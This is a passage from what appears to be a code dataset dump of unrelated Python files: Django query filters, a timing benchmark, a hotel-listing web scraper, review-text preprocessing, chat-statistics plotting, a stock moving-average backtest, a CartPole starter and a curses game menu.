    if condition.province_id != 0 and condition.province_id != "" and condition.province_id != "0":
        demands = demands.filter(Q(company_provinces__id=condition.province_id)) #Q(company_provinces=None) |
    # Industry matches the selected node or any descendant up to two levels deep.
    if condition.industry is not None:
        demands = demands.filter(Q(company_industries=condition.industry) | Q(company_industries__father=condition.industry) | Q(company_industries__father__father=condition.industry)) #Q(company_industries=None) |
    if condition.member_id != 0 and condition.member_id != "":
        demands = demands.filter(member_id=condition.member_id)
    if condition.status != -1 and condition.status != "":
        demands = demands.filter(status=condition.status)
    if page <= 1:
        page = 1
    if pagesize <= 1:
        pagesize = 1
    start_record = (int(page)-1) * int(pagesize)
    end_record = int(start_record) + int(pagesize)
    if sort == "":
        sort = "time_desc"
    if sort == "time_desc":
        demands = demands.order_by("-id")
    elif sort == "time_asc":
        demands = demands.order_by("id")
    elif sort == "size_desc":
        demands = demands.order_by("-deal_size")
    elif sort == "size_asc":
        demands = demands.order_by("deal_size")
    elif sort == "hot_desc":
        demands = demands.order_by("-pv")
    # count() before slicing so 'total' reflects all matches, not one page.
    total = demands.count()
    data = demands[start_record:end_record]
    return data, total
|
7,965 | 3ee20391d56d8c429ab1bd2f6b0e5b261721e401 | from django.urls import path
from jobscrapper.views import *
urlpatterns = [
path('', home_vacancies_view, name="vacancy-home"),
path('list/', vacancies_view, name="vacancy"),
] |
7,966 | ba73562cd8ffa52a1fede35c3325e7e76a6dad54 | #!/usr/bin/env python
from __future__ import print_function
from types_ import SimpleObject, SimpleObjectImmutable, NamedTuple, SimpleTuple, c_struct
import timeit
import random
# Record-type implementations under benchmark; the list is shuffled before
# each measurement pass so a fixed order cannot bias warm-up effects.
TYPES = [
    SimpleObjectImmutable,
    SimpleObject,
    NamedTuple,
    SimpleTuple,
    c_struct,
]
# Sample constructor arguments (int, bytes, list) shared by every timed type.
a = 1035
b = b'\x54 - fo!'
c = [1, 5, 66, ]
def measure_creation():
    """Time construction of each record type with timeit and print results.

    TYPES is shuffled first so measurement order cannot systematically
    favour later (already warmed-up) entries; each type reports the raw
    list from timeit.repeat (5 repetitions).
    """
    random.shuffle(TYPES)
    for type_ in TYPES:
        # The timed statement imports the class and the shared a/b/c args
        # from __main__, then constructs one instance per iteration.
        pre = 'from __main__ import {}, a, b, c'.format(type_.__name__)
        body = '{}(a, b, c)'.format(type_.__name__)
        print('\t', type_.__name__, timeit.repeat(stmt=body, setup=pre, repeat=5))
def test_immut():
    '''Verifies that the type called SimpleObjectImmutable
    actually satisfies that definition.
    '''
    from types_ import read_only
    q = SimpleObjectImmutable(a, b, c)
    SimpleObjectImmutable.__setattr__ = read_only
    # After installing read_only, attribute assignment must raise.
    # NOTE(review): assumes read_only raises ValueError -- confirm in types_.
    try:
        q.a = 1
        assert(False)
    except ValueError:
        assert(True)
if __name__ == '__main__':
    # Run the benchmark first, then the immutability self-check.
    measure_creation()
    test_immut()
|
7,967 | 6c7162a9bd81d618abda204c24031c5a5acc61b4 | '''
@Description:
@Version: 1.0
@Autor: Henggao
@Date: 2020-02-20 16:17:05
@LastEditors: Henggao
@LastEditTime: 2020-02-20 16:32:45
'''
name = "henggao"
def change():
name = "Brill"
print(name)
print(locals())
print(globals())
change()
print(name) |
def best_rank_selection(generation):
    """Elitist selection: return the top 10% of *generation* by fitness.

    Individuals are ranked by their ``fitness`` attribute, highest first;
    Python's stable sort preserves the original relative order of ties.
    Generations with fewer than 10 members yield an empty selection.
    """
    elite_count = len(generation) // 10
    ranked = sorted(generation, key=lambda member: member.fitness, reverse=True)
    return ranked[:elite_count]
|
7,969 | 931e73ffce6d24dbfb92501670245e20fc403a7a | # -*- coding:utf-8 -*-
from spider.driver.spider.base.spider import *
class LvmamaHotelSpider(Spider):
    """Spider for the lvmama.com mobile site: hotel listings and reviews."""
    def get_comment_info2(self,shop_data):
        """Scrape the review list for one hotel page (already open in the
        current tab) and persist the rows into ``self.comments``."""
        params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)
        comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)
        # Refresh until at least ~70% of the expected reviews have rendered.
        while(True):
            comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(
                css_selector=params_list_comment1.list_css_selector)
            if comments_list_len < comment_len*0.7:
                self.driver.refresh()
                time.sleep(0.5)
            else:
                break
        self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)
        try:
            # Expand each collapsed review ("arrow" toggles).
            for each in self.until_presence_of_all_elements_located_by_css_selector(
                css_selector=params_list_comment1.list_css_selector+' > div.arrow'):
                self.until_click_by_vertical_scroll_page_down(click_ele=each)
        except Exception as e:
            self.error_log(e=e)
        # The scrolling above lazily loads the full comment list.
        external_key={
            FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),
            FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),
            FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
        }
        self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)
    def get_comment_info(self):
        """Open each stored shop's comment URL in a new tab and scrape it."""
        for shop_data in self.get_current_data_list_from_db(self.shops):
            url = shop_data.get(FieldName.COMMENT_URL)
            if url:
                self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)
    def get_shop_info(self):
        """Search the configured region, open the hotel tab, and persist the
        resulting shop list into ``self.shops``."""
        self.info_log(data='进入驴妈妈移动版主页...')
        self.driver.get('https://m.lvmama.com')
        time.sleep(1.5)
        self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')
        time.sleep(1)
        self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)
        self.info_log(data='输入%s...'%self.data_region)
        self.until_send_enter_by_css_selector(css_selector='#keyword')
        self.info_log(data='搜索%s...'%self.data_region)
        time.sleep(1)
        self.until_click_by_css_selector(css_selector='#tab_hotel > a')
        self.info_log(data='点击%s...'%self.data_source)
        time.sleep(3)
        params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)
        # Page down repeatedly until the whole lazily-loaded list is present.
        self.until_ismore_by_send_key_arrow_down_judge_by_len(
            list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',
            min_frequency=100,max_frequency=500,timeout=1)
        self.info_log(data='shopinfo')
        params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # selector/param spec for the shop-list items
        shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)
        params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)
        # Enrich each row by visiting the shop detail page in a new tab.
        shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,
            url_name=FieldName.SHOP_URL,pause_time=1)
        for shop_data in shop_data_list:
            # Upsert key: URL + id + name uniquely identify a shop.
            key = {
                FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),
                FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),
                FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
            }
            self.save_data_to_db(target=self.shops,key=key,data=shop_data)
    def run_spider(self):
        """Entry point: scrape shops (comment scraping currently disabled)."""
        self.get_shop_info()
# self.get_comment_info() |
7,970 | 04867e8911f7cb30af6cefb7ba7ff34d02a07891 | #coding: utf8
import argparse
import sqlite3
from collections import Counter
from random import shuffle
def wordCount(db):
    """Count occurrences of every token across all training reviews in *db*.

    Args:
        db: path to the sqlite database consumed by iterReviews().

    Returns:
        A collections.Counter mapping word -> occurrence count. Counter is
        a dict subclass, so existing callers that index or iterate the
        result keep working; the manual check-then-increment loop of the
        original is replaced by Counter.update, which does the same thing
        in C.
    """
    words = Counter()
    for sent, _labels in iterReviews(db):
        words.update(sent)
    return words
def filterWords(words, min_count=0):
    """Return the set of words whose count in *words* is at least *min_count*."""
    return {word for word, count in words.items() if count >= min_count}
def iterReviews(db):
    """Yield (tokens, labels) for every sentence of every non-test review.

    tokens: the sentence split on single spaces.
    labels: ['u_<user>', 'i_<item>', 'r_<rating>'] metadata tags.

    Rows with any NULL field are skipped, as are sentences shorter than
    two characters.
    """
    con = sqlite3.connect(db)
    c = con.cursor()
    i = 0
    for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):
        if pid is None or uname is None or rating is None or rev is None:
            continue
        else:
            # Naive sentence split on '.'; abbreviations are not handled.
            for sent in rev.split("."):
                if len(sent) < 2:
                    continue
                else:
                    yield (sent.split(" "), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])
                # Sentence counter (currently unused by callers).
                i += 1
def main(args):
    """Write a shuffled '<label> <sentence>' training file from the review DB.

    Keeps only words occurring at least args.min_count times, drops
    sentences shorter than args.min_sent_size after filtering, and emits
    one line per (label, sentence) pair, shuffled in batches of
    args.buff_size to bound memory.
    """
    f = open(args.output, "w",encoding="utf-8")
    buff = []
    i = 0
    # Vocabulary: words frequent enough to keep.
    words = filterWords(wordCount(args.db), min_count=args.min_count)
    for sent, labels in iterReviews(args.db):
        sent = [word for word in sent if word in words]
        if len(sent) < args.min_sent_size:
            continue
        for label in labels:
            buff.append("{} {}\n".format(label, " ".join(sent)))
            i += 1
        # Flush in shuffled batches: randomises line order within each
        # batch while keeping memory bounded.
        if len(buff) >= args.buff_size:
            shuffle(buff)
            for se in buff:
                f.write(se)
            buff = []
            print("wrote {} sentences".format(i))
    # Final partial batch.
    shuffle(buff)
    for se in buff:
        f.write(se)
    f.close()
    print("wrote {} sentences".format(i))
# Command-line interface. Runs on import as well as direct execution --
# NOTE(review): consider guarding with `if __name__ == "__main__":`.
parser = argparse.ArgumentParser()
parser.add_argument("db", type=str)
parser.add_argument("output", type=str, default="sentences.txt")
parser.add_argument("--min_count", type=int, default=100)
parser.add_argument("--min_sent_size", type=int, default=5)
parser.add_argument("--buff_size", type=int, default=1000000)
args = parser.parse_args()
main(args)
|
7,971 | b297a09ee19bb8069eb65eb085903b3219c6fe5a | import math
import datetime
import numpy as np
import matplotlib.pyplot as plt
def draw_chat(
        id, smooth_id, main_mode,
        my_name, chat_day_data,
        main_plot, pie_plot, list_chats_plot):
    """Redraw the three panels of the chat-statistics UI for one chat.

    Args:
        id: index of the selected chat in chat_day_data (wraps around).
        smooth_id: index into the per-day smoothing widths (wraps around).
        main_mode: 0 -> per-minute-of-day histogram, else whole-history bars.
        my_name: display name for the local user.
        chat_day_data: per-chat records; by the indexing below each entry is
            (companion_name, pie_sizes, sum_score, calendar) where sum_score
            holds two 1440-long per-minute series (mine / theirs) and
            calendar maps date -> traffic volume -- TODO confirm units.
        main_plot, pie_plot, list_chats_plot: matplotlib Axes to draw into.
    """
    min_in_day = 1440
    # Only the last assignment is effective; earlier lists kept for reference.
    possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
    possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
    possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)
    count_of_chats = len(chat_day_data)
    # Wrap negative / overflowing indices.
    id = (id + count_of_chats) % count_of_chats
    smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)
    smooth = possible_smooth[smooth_id]
    sum_score = chat_day_data[id][2]
    calendar = chat_day_data[id][3]
    companion_name = chat_day_data[id][0]
    def draw_main_plot_as_all():
        # Whole-history view: one bar per calendar day, smoothed.
        first_day = 0
        def gen_data():
            nonlocal first_day
            calendar_dates = list(calendar.keys())
            ind = [0]
            now = min(calendar_dates)
            first_day = now
            last = max(calendar_dates)
            duration = (last - now).days + 1
            # Thin out x labels so roughly 25 fit on the axis.
            need_space_btw_labels = duration // 25
            labels = [now]
            last_label = 0
            t = 0
            vals = [0] * duration
            vals[0] = calendar[now]
            while now != last:
                now += datetime.timedelta(days=1)
                t += 1
                if now in calendar_dates:
                    ind.append(t)
                    vals[t] = calendar[now]
                if t-last_label >= need_space_btw_labels:
                    last_label = t
                    labels.append(str(now))
                else:
                    labels.append("")
            def make_smoothie(a, shift):
                # Weighted moving average over a +/-shift window with
                # cosine-squared-derived weights (clipped at zero).
                n = len(a)
                res = [0] * n
                koef = []
                for i in range(shift+1):
                    koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )
                for i in range(n):
                    sum = 0
                    sum_k = 0
                    for j in range(-shift, shift+1):
                        if 0 <= i+j < n:
                            k = koef[abs(j)]
                            sum += a[i+j] * k
                            sum_k += k
                    res[i] = sum / sum_k
                return res
            # Smoothing window grows with history length.
            s = int((duration/50)**0.5) #random.randint(0,10)
            print(duration, s)
            vals = make_smoothie(vals, s)
            return ind,labels,vals
        width = 1 # default value
        plot = main_plot
        plot.clear()
        ind, labels, vals = gen_data()
        plot.set_xticks(ind)
        plot.set_xticklabels(labels)
        plot.xaxis.set_tick_params(rotation=90)
        #plot.bar(ind, vals, width)
        plot.bar(range(len(vals)), vals, width)
        def format_coord(x, y):
            # Status-bar text: the hovered date plus its traffic (Kb above 512).
            day = int(x + 0.5)
            day = first_day + datetime.timedelta(days=day)
            #print(day,y)
            val = 0
            if day in calendar:
                val = calendar[day]
                if val > 512:
                    val = str(val // 1024) + "." + str(int((val % 1024 / 102.4 + 0.5)))
                    val += "Kb"
                return str(day) + " " + str(val)
            return str(day)
        plot.format_coord = format_coord
        #plot.set_yscale('log')
    def draw_main_plot_as_day():
        # Per-day view: stacked bars of my/their activity per time-of-day bin.
        N = min_in_day // smooth
        def set_smooth(score, smooth):
            # Sum per-minute scores into N bins of 'smooth' minutes each.
            res = [0] * N
            for i in range(min_in_day):
                res[i//smooth] += score[i]
                #res[i] = sum(score[i*smooth:(i+1)*smooth])
            return res
        me_score = set_smooth(sum_score[0], smooth)
        he_score = set_smooth(sum_score[1], smooth)
        ind = np.arange(N)
        width = 1
        def gen_time_labels():
            # Set step between labels for they count of be near the 24
            k = int(N / 24 + 0.5)
            def time(t):
                # get time in format `h:mm` from `t` as minute
                return str(t//60) + ":" + str(t//10%6)+str(t%10)
            labels = [time(x*smooth) if x % k == 0 else ""
                      for x in range(N)]
            return labels
        width = 0.8 # default value
        plot = main_plot
        plot.clear()
        plot.set_xticks(ind)
        plot.set_xticklabels(gen_time_labels())
        plot.xaxis.set_tick_params(rotation=90)
        # Stacked bars: mine on the bottom, companion's on top.
        p1 = plot.bar(ind, me_score, width)
        p2 = plot.bar(ind, he_score, width, bottom=me_score)
        plot.legend((p1[0], p2[0]), (my_name, companion_name))
        def format_coord(x,y):
            # Status bar shows my share of the hovered bin's traffic.
            x = int(x+0.5)
            if 0 <= x < len(me_score) and me_score[x] + he_score[x]:
                rate = me_score[x] / (me_score[x] + he_score[x])
                return f"rate: {rate*100:.2f}%"
            return None
        plot.format_coord = format_coord
    def draw_main_plot(mode):
        if mode == 0:
            draw_main_plot_as_day()
        else:
            draw_main_plot_as_all()
    def draw_pie():
        # Donut chart of the chat's message-type breakdown; the third slice
        # (forwarded messages) is exploded.
        sizes = chat_day_data[id][1]
        explode = [0, 0, 0.1]
        pie_plot.clear()
        def get_angle():
            # Set green part (forwarded message) in central bottom part
            return -90 + 360*(sizes[2]/(2*sum(sizes)))
        pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',
                     shadow=True, startangle=get_angle())
        pie_plot.format_coord = lambda x,y: None
    def draw_list_chats(id):
        # Sidebar: the selected chat with up to 4 neighbours above and 5 below,
        # as horizontal bars of total traffic; the selection is re-drawn in a
        # second colour.
        chats_above = 4
        chats_bottom = 5
        if count_of_chats < chats_above + 1 + chats_bottom:
            chats_above = id
            chats_bottom = count_of_chats - id - 1
        if id < chats_above:
            chats_bottom += chats_above - id
            chats_above = id
        if id + chats_bottom >= count_of_chats:
            chats_bottom = count_of_chats - id - 1
        plot = list_chats_plot
        N = chats_above + 1 + chats_bottom
        people = []
        scores = []
        for i in range(-chats_above, chats_bottom+1):
            people.append(chat_day_data[i+id][0])
            scores.append(sum(chat_day_data[i+id][1]))
        selected_chat = [0] * N
        selected_chat[chats_above] = scores[chats_above]
        plot.clear()
        plot.set_yticks(range(N))
        plot.set_yticklabels(people)
        plot.invert_yaxis()
        plot.yaxis.tick_right()
        plot.invert_xaxis()
        plot.axes.get_xaxis().set_visible(False)
        #plot.axes.get_yaxis().set_ticks([])
        bars = plot.barh(range(N), scores)
        plot.barh(range(N), selected_chat)
        plot.format_coord = lambda x,y: None
        # Bar-value annotations: deliberately disabled via 'continue'
        # (dead code below kept for future use -- TODO confirm intent).
        for bar in bars:
            continue
            height = bar.get_y() + bar.get_height() / 2
            width = bar.get_x() + bar.get_width()
            plot.annotate(f' {str(width)[:]}',
                          xy=(width, height),
                          ha='left', va='center')
    draw_main_plot(main_mode)
    draw_pie()
    draw_list_chats(id)
    plt.draw()
|
# For each of T input strings, print the characters at even indices,
# a space, then the characters at odd indices.
t = int(input())  # int() instead of eval(): never eval untrusted input
for _ in range(t):
    s = input()
    # Slicing replaces the original index-parity loop with two list builds:
    # s[::2] keeps even positions, s[1::2] keeps odd positions.
    print(s[::2] + " " + s[1::2])
|
7,973 | 8d5e652fda3fb172e6faab4153bca8f78c114cd1 | from datareader import *
import matplotlib.pyplot as plt
from plotting import *
from misc import *
import leastSquares as lsModel
import masim as mAvgSim
import numpy as np
import pandas as pd
import statistics as stat
from datetime import datetime as dt
from time import mktime
def main():
    """Entry point: run the daily buy/sell signal check over the China
    stock list.  The commented-out lines below are alternative pipelines
    (scraping, single-stock backtests, batch backtests) kept as recipes.
    """
    # scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',
    # start='2019-09-16',end='2020-11-12')
    # cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)
    # cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')
    # df_stock = pd.read_csv('603131.csv')
    # df_cypt = pd.read_csv('LINK-USD.csv')
    # df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')
    # sim = mAvgSim.movingAverageSim(df_stock)
    # sim = mAvgSim.movingAverageSim(df_cypt)
    # net,num_trades,test_error = sim.run_simulation(ndays=15)
    # sim.plot_graph()
    # test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)
    daily_signal_checker('china_stocks.csv',location='chineseStocks/')
    # update_open_close('china_stocks.csv',location='chineseStocks/')
    # tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)
    # df_stock = tmp.read_csv('chineseStocks/')
    # open_price = tmp.get_today_open()
    # df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
    # sim = mAvgSim.movingAverageSim(df_stock)
    # sim.run_simulation(ndays=5)
    # signals = sim.produce_buy_sell(ndays=1)
    # print(signals)
def update_portfolio(portfolio_path='portfolio.csv'):
    """Load the portfolio CSV and return it as a DataFrame.

    BUG FIX: the original body was ``portfolio = pd.read_csv(portfolio)``
    with ``portfolio`` an unbound local name, so every call raised
    ``UnboundLocalError``.  The path is now a parameter with a default so
    the zero-argument call signature stays compatible.
    """
    return pd.read_csv(portfolio_path)
def daily_signal_checker(stocks,location):
    """For each stock code in the *stocks* CSV, append today's open price to
    its cached history and print the moving-average buy/sell signal.

    *stocks* is a CSV path with a 'Code' column; *location* is the directory
    holding the per-stock history CSVs.
    """
    # Lookback window for the moving-average signal.
    ndays=6
    # Get updated stock prices (whole csv)
    # scrape_data(pd.read_csv(stocks),location='chineseStocks/',
    # start='2019-09-16',end='2020-11-24')
    # Run through stock list to get opens and predict
    stock_list = pd.read_csv(stocks)
    for code in stock_list['Code']:
        tmp = backtest_database(code,'2019-09-16','2020-11-18',1)
        df_stock = tmp.read_csv(location=location)
        open_price = float(tmp.get_today_open())
        # print(code)
        print(open_price)
        # Append today's open as a new row so the simulator sees it.
        df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
        sim = mAvgSim.movingAverageSim(df_stock)
        signals = sim.produce_buy_sell(ndays=ndays)
        print("Company:",code,
              "Signals:",signals)
def scrape_data(stock_list,location,start,end):
    """Download the [start, end] price history for every code in
    *stock_list* (a DataFrame with a 'Code' column) and cache each one as a
    CSV under *location*."""
    for code in stock_list['Code']:
        print("Got Code:",code)
        backtest_database(code,start,end,1).create_csv(location=location)
def test_stock_list(stock_list,location,ndays):
    """Backtest the moving-average strategy over every stock in *stock_list*
    and print aggregate profit statistics (net, mean, stdev, test error)."""
    returns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])
    for code in stock_list['Code']:
        print(code)
        df_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)
        sim = mAvgSim.movingAverageSim(df_stock)
        net,num_trades,test_error = sim.run_simulation(ndays=ndays)
        # Skip companies where the strategy produced no trades.
        if num_trades == 0:
            continue
        returns = returns.append({
            'Company' : code,
            'No. Trades' : num_trades,
            'Net return' : net,
            'Test Error' : test_error
        },ignore_index=True)
        # print('Company:',code,'\n Number of Trades',num_trades,'\n Net % return',net)
    print("Mean Test Error = ", np.mean(returns['Test Error']))
    net_profit = np.sum(returns['Net return'])
    companies_traded = len(returns)
    mean = stat.mean(returns['Net return'])
    std = stat.stdev(returns['Net return'])
    print("Net Profit =",net_profit,
          '\n Total number of companies traded =',companies_traded,
          '\n Mean Profit =',mean,
          '\n Standard Deviation',std)
    print(returns)
# Script entry point.
if __name__ == "__main__":
    main()
|
7,974 | 054d7e4bd51110e752a18a5c0af4432a818ef3b8 | __all__ = ["AddonsRepository", "Addon", "Addons", "Utils"] |
7,975 | 3c79c528cc19380af8f2883b9e35855e29b151a3 | #CartPoleStarter
import gym
## Defining the simulation related constants
NUM_EPISODES = 1000
def simulate():
    """Run NUM_EPISODES episodes of CartPole-v0, rendering every step.

    Starter code: the action is only initialized in episode 0 and is meant
    to be recomputed from the observation (see the TODO inside the loop).
    """
    ## Initialize the "Cart-Pole" environment
    env = gym.make('CartPole-v0')
    for episode in range(NUM_EPISODES):
        done = False
        # Reset the environment
        obv = env.reset()
        initial_action = 0 #initial action is to move the cart to the left (arbitrary)
        total_reward = 0
        steps = 0
        while done != True:
            # render the simulation
            env.render()
            # Select an action
            if episode == 0:
                action = initial_action
            # Execute the action
            # NOTE(review): after episode 0, 'action' simply keeps its last
            # value from the previous episode; the TODO below is where it
            # should be recomputed from obv each step.
            obv, reward, done, _ = env.step(action)
            print(obv)
            total_reward += reward
            steps +=1
            #TODO:
            #change the action here based on the obv
            #make action = 0 (left) or action = 1 (right) based on if-statements
        print("Episode", episode, "finished after", steps, "time steps with total reward", total_reward)
# Run the demo when executed as a script.
if __name__ == "__main__":
    simulate()
|
7,976 | a6f03340c2f60c061977fed6807703cdaeb1b7fd | #!/usr/bin/python3
#start up curses
import curses
HEIGHT = 24
WIDTH = 80
TESTING = True
curses.initscr()
stdscr = curses.newwin(HEIGHT, WIDTH, 0, 0)
curses.noecho() #don't echo keys
stdscr.keypad(1)
#function for displaying other players decision
#statement is the number of the other player's death funciton returned
#player is the other player's name
#returns 0 if other player choose to play again and this player doesn't
#want to, if player does want to then returns 1
#returns -1 if other player choose to quit to main menu
def decision(statement, player):
    """Show the other player's end-of-game decision and collect ours.

    *statement* is 1 if the partner chose to play again, 0 if they quit to
    the main menu; *player* is the partner's name (currently unused in the
    display).  Returns 1 to play again, 0 to decline, -1 when the partner
    quit.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(-1)  # block until a key is pressed
    decision = "play again" if statement == 1 else "return to main menu"
    stdscr.addstr(3, 5, "Your Partner has decided to " + decision)
    if statement == 1:
        stdscr.addstr(5, 10, "Do you want to play again?")
        stdscr.addstr(7, 10, "Press y for yes and n for no")
        stdscr.refresh()
        while True:
            choice = stdscr.getch()
            if choice == 110: #choice is n
                return 0
            elif choice == 121: #choice is y
                return 1
    elif statement == 0:
        stdscr.addstr(5, 5, "You will be taken back to the main menu.")
        return -1
#funciton for waiting screen for starting a game as player 1
#takes other player's name
#returns 0 if player wants to return to main menu
#returns 1 if player wants to play again
#returns -1 if while loop is exited (which shouldn't happen)
def death(player):
    """Death screen: ask whether to play again or return to the main menu.

    Returns 1 to play again, 0 for the main menu.  The commented-out lines
    sketch the planned network synchronization with the other player; the
    trailing ``return -1`` is unreachable because the loop only exits via
    return.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(100)  # poll every 100 ms
    stdscr.addstr(3, 5, "You have died. What do you want to do?")
    stdscr.addstr(5, 10, "Play Again - Press p")
    stdscr.addstr(7, 10, "Return to Main Menu - Press r")
    stdscr.refresh()
    while True:
        #if other player already made a decision
        # statement = other player's decision
        # choice = decision(statement, player)
        # if statement == 1:
        # send choice to other player
        # if choice == 0 or choice == -1:
        # return 0
        # elif choice == 1:
        # return 1
        choice = stdscr.getch()
        #send choice to other player
        if choice == 114: #choice is r
            return 0
        elif choice == 112: #choice is p
            #choice = get decision back from other player
            #if choice == 1:
            #print message saying other player agrees to play again
            return 1
        #elif choice == 0
        #print message saying other player quit to main menu
        #return 0
    return -1
#funciton for waiting screen for starting a game as player 1
#returns 0 if player wants to return to main menu
#returns 1 if a 1st player is chosen
#returns -1 if while loop is exited (which shouldn't happen)
def join():
    """Screen for joining an existing game as player 2.

    Returns 0 if the player backs out to the main menu, 1 once a first
    player is chosen (networking not yet implemented); the trailing -1 is
    unreachable.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(-1)  # block until a key is pressed
    stdscr.addstr(3, 5, "Pick a player to join")
    #get list of available players from the server
    #loop through them all and display them (maybe only the first 10)
    #make a counter for the addstr y value and increment by 2 each loop
    stdscr.addstr(5, 10, "Return to Main Menu - Press r")
    stdscr.refresh()
    while True:
        choice = stdscr.getch()
        if choice == 114: #choice is r
            return 0
        #elif check if a first player has been chosen
        # send this player's name to first player
        # get back first player's name
        # return 1
    return -1
#funciton for waiting screen for starting a game as player 1
#returns 0 if player wants to return to main menu
#returns 1 if a second player is chosen
#returns -1 if while loop is exited (which shouldn't happen)
def start():
    """Waiting screen shown while hosting a game as player 1.

    Returns 0 if the player backs out to the main menu, 1 once a second
    player joins (networking not yet implemented); the trailing -1 is
    unreachable.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(100)  # poll every 100 ms so we can notice a joiner
    stdscr.addstr(3, 5, "Waiting for 2nd player")
    stdscr.addstr(5, 10, "Return to Main Menu - Press r")
    stdscr.refresh()
    while True:
        choice = stdscr.getch()
        if choice == 114: #choice is r
            return 0
        #elif check if a second player has been chosen
        # get second player's name
        # send this player's name
        # return 1
    return -1
def pause():
    """Show the pause menu and block until the player picks an option.

    Returns 1 to continue, 0 to swap controls, -1 to end the game.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(-1)
    stdscr.addstr(3, 5, "Paused. What do you want to do?")
    stdscr.addstr(5, 10, "Continue - Press c")
    stdscr.addstr(7, 10, "Swap Controls - Press s")
    stdscr.addstr(9, 10, "End Game - Press e")
    stdscr.refresh()
    # Map key codes to return values: c=continue, s=swap, e=end.
    outcomes = {ord('c'): 1, ord('s'): 0, ord('e'): -1}
    while True:
        key = stdscr.getch()
        if key in outcomes:
            return outcomes[key]
def menu(name):
    """Main menu: greet *name* and ask what to do.

    Returns 1 to start a new game (also the default for any other key),
    0 to exit.
    """
    stdscr.clear()
    stdscr.border(0)
    stdscr.timeout(-1)
    stdscr.addstr(3, 5, name + ", what do you want to do?")
    stdscr.addstr(5, 10, "Play new game - Press 1")
    stdscr.addstr(7, 10, "Exit - Press 4")
    stdscr.refresh()
    key = stdscr.getch()
    stdscr.clear()
    stdscr.border(0)
    if key == ord('4'):
        return 0
    # '1' or anything else starts a game.
    return 1
# Main game loop.  In TESTING mode a frame counter is drawn at the player's
# position; arrow keys move the active player's axis (player 0 = horizontal,
# player 1 = vertical), clamped to the window, and 'p' opens the pause menu.
# NOTE(review): nesting reconstructed from context (source indentation was
# lost); confirm against the original file.
play = menu("HOPPY")
c = 1
x = 25
y = 12
player = 0
while play:
    if TESTING:
        stdscr.clear()
        stdscr.border(0)
        stdscr.addstr(y, x, str(c))
    stdscr.timeout(100)
    button = stdscr.getch()
    if button != -1:
        if button == curses.KEY_RIGHT and player == 0:
            x += 1
            if x >= WIDTH - 1:
                x -= 1
        elif button == curses.KEY_LEFT and player == 0:
            x -= 1
            if x <= 0:
                x += 1
        elif button == curses.KEY_UP and player == 1:
            y -= 1
            if y <= 0:
                y += 1
        elif button == curses.KEY_DOWN and player == 1:
            y += 1
            if y >= HEIGHT - 1:
                y -= 1
        if button == 112: #button is p
            cont = pause()
            if cont == -1:
                # End game: reset state and go back to the menu.
                c = 1
                player = 0
                play = menu("HOPPY")
            elif cont == 0:
                # Swap which player the arrow keys control.
                player = (player + 1) % 2
    if TESTING:
        c += 1
# Restore the terminal before exiting.
stdscr.keypad(0)
curses.echo()
curses.endwin()
#curse.wrapper([funciton]) sets up and exits curses for you, function is the
#code the runs in curses
#initialize curses
#curses.noecho() #don't echo keys
#curses.cbreak() or curses.raw() #react instantly to keys, raw doesn't ignore
#CTRL-Z(suspend) and CTRL-C(exit)
#stdscr.keypad(1) #read navigation key sequences for me
#deinitialize curses
#curses.nocbreak(); stdscr.keypad(0); curses.echo()
#exit curses
#curses.endwin()
|
7,977 | a801ca6ae90556d41fd278032af4e58a63709cec | # -*- coding: utf-8 -*-
import sys
import getopt
import datetime
import gettext
import math
import datetime
import json
import gettext
from datetime import datetime
FIELD_INDEX_DATE = 0
FIELD_INDEX_DATA = 1
def getPercentile(arr, percentile):
    """Return the *percentile*-th percentile of the sorted sequence *arr*.

